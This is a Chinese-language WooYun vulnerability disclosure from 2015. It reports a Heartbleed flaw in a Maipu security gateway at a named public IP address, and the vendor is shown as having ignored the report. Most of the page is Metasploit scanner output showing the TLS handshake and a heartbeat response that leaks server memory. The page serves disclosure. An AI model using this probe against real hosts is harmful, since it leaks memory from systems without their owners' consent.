当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118186

漏洞标题:迈普通信某安全网关存在心脏出血

相关厂商:maipu.cn

漏洞作者: 路人甲

提交时间:2015-06-04 14:09

修复时间:2015-06-09 14:10

公开时间:2015-06-09 14:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

**

详细说明:

地址:https://58.221.91.194/login.html

[*] 58.221.91.194:443 - Sending Client Hello...
[!] SSL record #1:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  86
[!] 	Handshake #1:
[!] 		Length: 82
[!] 		Type:   Server Hello (2)
[!] 		Server Hello Version:           0x0301
[!] 		Server Hello random data:       556fd66ef9aa1510320df88a51d80a631047da3ffce1b1304486bbe92a44ed0d
[!] 		Server Hello Session ID length: 32
[!] 		Server Hello Session ID:        9ffc7a35aeabe4f585b8d5594a9f465165865a1d3ec9beed7505e6cf3ed30725
[!] SSL record #2:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  707
[!] 	Handshake #1:
[!] 		Length: 703
[!] 		Type:   Certificate Data (11)
[!] 		Certificates length: 700
[!] 		Data length: 703
[!] 		Certificate #1:
[!] 			Certificate #1: Length: 697
[!] 			Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005687680>, issuer=#<OpenSSL::X509::Name:0x000000056875b8>, serial=#<OpenSSL::BN:0x000000056874f0>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>
[!] SSL record #3:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  203
[!] 	Handshake #1:
[!] 		Length: 199
[!] 		Type:   Server Key Exchange (12)
[!] SSL record #4:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  4
[!] 	Handshake #1:
[!] 		Length: 0
[!] 		Type:   Server Hello Done (14)
[*] 58.221.91.194:443 - Sending Client Hello...
[!] SSL record #1:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  86
[!] 	Handshake #1:
[!] 		Length: 82
[!] 		Type:   Server Hello (2)
[!] 		Server Hello Version:           0x0301
[!] 		Server Hello random data:       556fd67959f6d9534df1a7521901d3097ca2c90afe4a78a72372beecbb1b0375
[!] 		Server Hello Session ID length: 32
[!] 		Server Hello Session ID:        ac3710dc37e28416eefa02da2f28f6a95d112b9ebb46160f88c78b7c53ebec7e
[!] SSL record #2:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  707
[!] 	Handshake #1:
[!] 		Length: 703
[!] 		Type:   Certificate Data (11)
[!] 		Certificates length: 700
[!] 		Data length: 703
[!] 		Certificate #1:
[!] 			Certificate #1: Length: 697
[!] 			Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x000000055da340>, issuer=#<OpenSSL::X509::Name:0x000000055da2a0>, serial=#<OpenSSL::BN:0x000000055da200>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>
[!] SSL record #3:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  203
[!] 	Handshake #1:
[!] 		Length: 199
[!] 		Type:   Server Key Exchange (12)
[!] SSL record #4:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  4
[!] 	Handshake #1:
[!] 		Length: 0
[!] 		Type:   Server Hello Done (14)
[*] 58.221.91.194:443 - Sending Heartbeat...
[*] 58.221.91.194:443 - Heartbeat response, 12955 bytes
[+] 58.221.91.194:443 - Heartbeat response with leak
[*] 58.221.91.194:443 - Printable info leaked: Uo$M 5.[8sWyo{_f"!98532ED/A
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

漏洞证明:

RT

修复方案:

***

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-09 14:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无